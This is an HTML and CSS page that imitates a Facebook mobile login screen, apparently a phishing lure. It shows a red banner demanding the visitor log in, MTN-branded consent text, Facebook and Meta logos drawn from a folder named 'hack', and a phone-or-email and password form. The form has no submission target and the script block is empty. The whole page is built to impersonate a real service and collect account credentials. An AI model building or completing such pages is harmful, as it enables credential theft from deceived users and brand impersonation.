<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Page title</title>
</head>
<body>
    <div class="request">
     To visit ths site, Facebook request you must log into your account 
    </div>
   <img src="hack/set.png" alt="" class="set">
   <br>
   <br>
   <br>
   <span>English (UK) </span>
   <br>
   <br>
   <img src="hack/fb.png" alt="" class="fb">
   <br>
   <br>
   <hr>
   <br>
   <div class="note">
       <a>By proceeding,you agreed to <a href="#">MTN's Terms,</a>which includes letting Facebook request and receive your phone number.</a>
       <br>
       <a href="#">Change settings</a>
   </div>
   <br>
   <hr>
   <br>
     <form class="login-form">
            <input type="text" placeholder="Mobile number or email" required>
            <br>
            <input type="password" placeholder="Password" required><br>
            <button type="submit">Log In</button>
           
        </form>
        <img src="hack/meta.png" alt="" class="meta">
        <br>
        <div class="hm">
            <a class="a">About</a>
            <a class="a">Help</a>
            <a class="a">More</a>
        </div>
        
<style>
   .hm{ 
   width:100px;
   height:50px;
       display:block;
       margin:0 auto;
   } 
    body{
        margin:0;
        padding:0;
    }
    .a{
        font-size:0.8rem;
        color:grey;
        
    }
    
.info{
    width:100%;
    height:60px;
    background:lightblue;
    
} 
.request{
    background:red;
    width:100%;
    height:30px;
    color:white;
    font-family:fantasy;
    font-size:0.8rem;
    padding:3px 0px;
    padding-top:9px;
    text-align: center;
   
}
.meta{
    width:70px;
    display:block;
    margin:0 auto;
    margin-top:40%;
}
.note{
display:block;
border:border-box;
    padding-left:8px;
    padding-right:3px;
    font-family: fantasy;
    font-size:0.9rem;
    margin-left:3%;
}

a{
    text-decoration:none;
}

.set{
    width:60px;
    position:fixed;
    right:0;
} 

.fb{
display:block;
    width:50px;
    border-radius:50%;
    margin:0 auto;
}
span{
display:block;
margin:0 auto;
text-align:center;
}
hr{

    width:420px;
    opacity:0.5;
}

.login-form input {
    margin-bottom: 15px;
    padding: 10px;
    width:400px;
    border:1px solid grey;
    border-radius: 10px;
    text-align:left;
    margin:0 auto;
    display:block;
    height:30px;
    font-size:1rem;
    color:grey;
}

input::placeholder{
    text-align:left;
}
.login-form button {
    background-color: #1877f2;
    color: white;
    padding:16px;
    border: none;
    border-radius:20px;
    cursor: pointer;
    margin:0 auto;
    display:block;
    width:410px;
}

.login-form button:hover {
    background-color: #155dbb;
}

</style>  
<script>
    
</script>
</body>
</html>
